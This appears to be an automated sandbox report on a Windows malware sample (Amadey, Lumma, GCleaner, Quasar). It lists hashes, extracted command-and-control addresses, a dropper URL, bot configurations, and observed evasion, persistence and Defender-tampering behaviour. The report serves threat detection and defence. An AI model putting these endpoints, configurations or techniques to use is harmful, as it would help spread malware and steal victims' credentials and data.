amadey | eb38bc2ecfa1e5f1092f1f3053d15696e10cc2bc65294bfb20189a0e46c8868d

Analysis

max time kernel
113s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2025, 13:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

157c7edc26fa7d289b3ce9ea7216b5c8
SHA1

683b9760a0200f2c14e627b41f3bc12942f28220
SHA256

eb38bc2ecfa1e5f1092f1f3053d15696e10cc2bc65294bfb20189a0e46c8868d
SHA512

3b65eac53c031982e292bbd80a9c2ecc536223ddd15bf5fc2c6583ddabd440507ff07547794973bb02de4d9e086f68691d04b8c0bdecf3f0c5bc84bbae5fdd39
SSDEEP

24576:pqDEvCTbMWu7rQYlBQcBiT6rprG8a03u:pTvC/MTQYxsWR7a03

Score

10^/10

amadey gcleaner lumma quasar 092155 office04 defense_evasion discovery execution exploit loader persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://plantainklj.run/opafg

https://jrxsafer.top/shpaoz

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://pepperiop.digital/oage

https://.ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://yjrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://radvennture.top/GKsiio

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/4212-1632-0x0000000008070000-0x00000000081C4000-memory.dmp	family_quasar
behavioral1/memory/4212-1633-0x0000000008210000-0x000000000822A000-memory.dmp	family_quasar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	274d8a3c45.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	44e43277a9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	30c4aed2a1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	12ca9c48e4.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
20	3280	powershell.exe
199	2032	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3280	powershell.exe
2032	powershell.exe
4212	powershell.exe
4100	powershell.exe
5064	powershell.exe
5684	powershell.exe
1924	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 17 IoCs

flow	pid	Process
20	3280	powershell.exe
28	5904	rapes.exe
41	5904	rapes.exe
41	5904	rapes.exe
41	5904	rapes.exe
41	5904	rapes.exe
41	5904	rapes.exe
41	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
198	5904	rapes.exe
199	2032	powershell.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
868	takeown.exe
696	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	30c4aed2a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	12ca9c48e4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	12ca9c48e4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	274d8a3c45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8c7784fc03.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	30c4aed2a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	274d8a3c45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8c7784fc03.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	44e43277a9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	44e43277a9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	5uMVCoG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	272.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	8476304cbc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	272.exe
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5uMVCoG.exe	5uMVCoG.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5uMVCoG.exe	5uMVCoG.exe

Executes dropped EXE 64 IoCs

pid	Process
5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
5904	rapes.exe
5152	5uMVCoG.exe
2328	5uMVCoG.exe
3084	5uMVCoG.exe
3128	mtCxnCB.exe
5660	rapes.exe
4816	mtCxnCB.exe
1096	VrQSuEQ.exe
4512	b8573833a1.exe
3772	274d8a3c45.exe
5956	8c7784fc03.exe
5656	eb9dcd3c19.exe
5968	8476304cbc.exe
392	272.exe
3020	272.exe
2704	b538167fd6.exe
752	ff19489656.exe
3140	7a4616a2d4.exe
5264	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
6016	44e43277a9.exe
4928	5uMVCoG.exe
1520	rapes.exe
1752	30c4aed2a1.exe
4512	svchost015.exe
3556	12ca9c48e4.exe
5328	svchost015.exe
4184	YMauSAr.exe
2036	javaruntimew.exe
4612	javaupdaterw.exe
4760	javaplugin_platform.exe
1028	javasupport_platform.exe
5236	javaruntime_update.exe
4200	javasupportw.exe
5956	javaplugin_service.exe
3008	javaservice.exe
4752	javaupdater_platform.exe
6032	javaservice.exe
508	javaruntime_update.exe
2464	javaplugin.exe
2692	9sWdA2p.exe
740	javaupdater_service.exe
4724	javaruntime_platform.exe
4648	javaupdater.exe
2036	javasupportw.exe
4404	javapluginw.exe
4760	javaplatform.exe
1028	javasupport.exe
3708	javaservice.exe
1224	javaplatform_platform.exe
5956	javaruntimew.exe
3916	javaplatform_platform.exe
3840	javaplatformw.exe
3372	javapluginw.exe
2236	javaplatform_service.exe
5820	javaruntimew.exe
5576	javaupdater.exe
4172	javaplatform_platform.exe
1068	javaupdater_service.exe
2328	javaupdaterw.exe
2704	javaupdater_update.exe
2688	javasupportw.exe
3292	javaupdater_service.exe
2984	javaplatform_platform.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	274d8a3c45.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	44e43277a9.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	30c4aed2a1.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine	12ca9c48e4.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
696	icacls.exe
868	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb9dcd3c19.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478620101\\eb9dcd3c19.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8476304cbc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478630101\\8476304cbc.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javasupport_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javasupport_service.exe\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5uMVCoG = "C:\\Users\\Admin\\AppData\\Roaming\\5uMVCoG.exe"	5uMVCoG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\274d8a3c45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478600101\\274d8a3c45.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c7784fc03.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478610101\\8c7784fc03.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
248	ip-api.com
253	ipinfo.io
254	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000d00000002407a-195.dat	autoit_exe
behavioral1/files/0x00070000000242af-674.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
5116	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
5904	rapes.exe
5660	rapes.exe
3772	274d8a3c45.exe
5264	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
6016	44e43277a9.exe
1520	rapes.exe
1752	30c4aed2a1.exe
3556	12ca9c48e4.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1096 set thread context of 2924	1096	VrQSuEQ.exe	115
PID 4512 set thread context of 344	4512	b8573833a1.exe	118
PID 1752 set thread context of 4512	1752	30c4aed2a1.exe	234
PID 3556 set thread context of 5328	3556	12ca9c48e4.exe	236

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5336	sc.exe
3232	sc.exe
5200	sc.exe
6040	sc.exe
2260	sc.exe
3864	sc.exe
1456	sc.exe
2164	sc.exe
5328	sc.exe
1528	sc.exe
1848	sc.exe
3672	sc.exe
4800	sc.exe
4388	sc.exe
3148	sc.exe
5064	sc.exe
368	sc.exe
5264	sc.exe
1972	sc.exe
3816	sc.exe
1528	sc.exe
5752	sc.exe
4268	sc.exe
368	sc.exe
3196	sc.exe
5376	sc.exe
5484	sc.exe
6080	sc.exe
5532	sc.exe
2236	sc.exe
5752	sc.exe
1476	sc.exe
5880	sc.exe
1620	sc.exe
5228	sc.exe
384	sc.exe
1752	sc.exe
3264	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMauSAr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplugin_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mtCxnCB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	272.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdaterw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javapluginw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempOVRQKOFFXAHJW7N9VXFOL7S1SRCJLGHM.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdaterw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fbc2c884ad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javasupport_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntime_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdaterw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mtCxnCB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eb9dcd3c19.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	30c4aed2a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempQYTVOZCKEF2VXIA098U7OFQXA7MTHW3S.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatformw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaupdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaservice_platform.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaruntimew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaplatform_service.exe
